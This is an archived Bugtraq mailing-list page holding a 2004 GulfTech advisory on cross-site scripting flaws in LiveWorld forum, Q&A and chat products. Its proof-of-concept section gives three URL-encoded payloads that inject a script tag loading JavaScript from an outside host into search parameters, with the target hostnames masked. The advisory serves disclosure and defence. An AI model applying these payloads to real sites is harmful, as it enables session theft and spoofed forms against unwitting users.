Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Possible Security Issues In LiveWorld Products

from [GulfTech Security] Network Security [Permanent Link]
Subject: Possible Security Issues In LiveWorld Products
Date: Tue, 24 Aug 2004 13:20:40 -0500 
##########################################################
# GulfTech Security Research             August, 23rd 2004
##########################################################
# Vendor  : LiveWorld, Inc.
# URL     : http://www.liveworld.com
# Version : Multiple Products
# Risk    : Cross Site Scripting
##########################################################

Description:
LiveWorld provides collaborative services for online meetings, 
customer care, and loyalty marketing. Supporting communication 
between a company and its customers, employees, or partners 
and among those people themselves - our services help corpor-
ations cut costs, increase revenue, and solidify relationships 
with groups critical to their success. LiveWorld products are 
used on major websites such as HBO, eBay, and others.



Cross Site Scripting:
GulfTech Security Research have discovered Cross Site Scripting
issues that are believed to be present in multiple LiveWorld Inc
products such as LiveForum, LiveQ&A, LiveChat and LiveFocusGroup. 
It is also a good possibility that this issue exists in other 
LiveWorld products as they "seem" to share some of the same code. 
If you believe this to be incorrect, or have proof of it being
100% accurate then please let us know. These issues could allow 
for an attacker to run code in the context of a victims browser 
or temporarily deface a website that is running any of the 
affected applications.



Proof Of Concept:
I have done my best to contact LiveWorld, and eBay. As of the
time I am writing this, the holes are not patched, and these
examples work. However this may not be the case when this write
up becomes public. Please note that these URI's are wrapped for
the sake of readability.

http://answercenter.xxxx.com/search.jsp?q=%22%3E%3Cscript+src%3D
%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript
%3E%3C%21--%3C%21--

http://groups.xxxx.com/findclub!execute.jspa?q=%22%3E%3Cscript+s
rc%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fs
cript%3E%3C%21--%3C%21--

http://boards.xxx.com/search!execute.jspa?q=%22%3E%3Cscript+src%
3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscri
pt%3E%3C%21--%3C%21--

These examples simply print the GulfTech name to the browser, but
this could just as easily be a spoofed form, or a malicious script.

Edit: I have edited out the real web addresses.



Solution:
LiveWorld Inc was contacted about these issues, but has not yet
responded. Perhaps they will see this advisory and fix the holes :)
Any future fix will likely be posted on their website.



Related Info:
The original advisory can be found at the following location 
http://www.gulftech.org/?node=research&article_id=00044-08232004



Credits:
James Bercegay of the GulfTech Security Research Team
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Possible Security Issues In LiveWorld Products, GulfTech Security <=
Previous by Date:  RE: [Full-Disclosure] Microsoft updates documentation on Windows time synchronization, Nicolas villatte
Next by Date:  Re: [ GLSA 200408-19 ] courier-imap: Remote Format String Vulnerability, ktha
Previous by Thread:  [Full-Disclosure] [ GLSA 200408-23 ] kdelibs: Cross-domain cookie injection vulnerability, Joshua J. Berry
Next by Thread:  Re: [ GLSA 200408-19 ] courier-imap: Remote Format String Vulnerability, ktha
Indexes:  [Date] [Thread] [Top] [All Lists]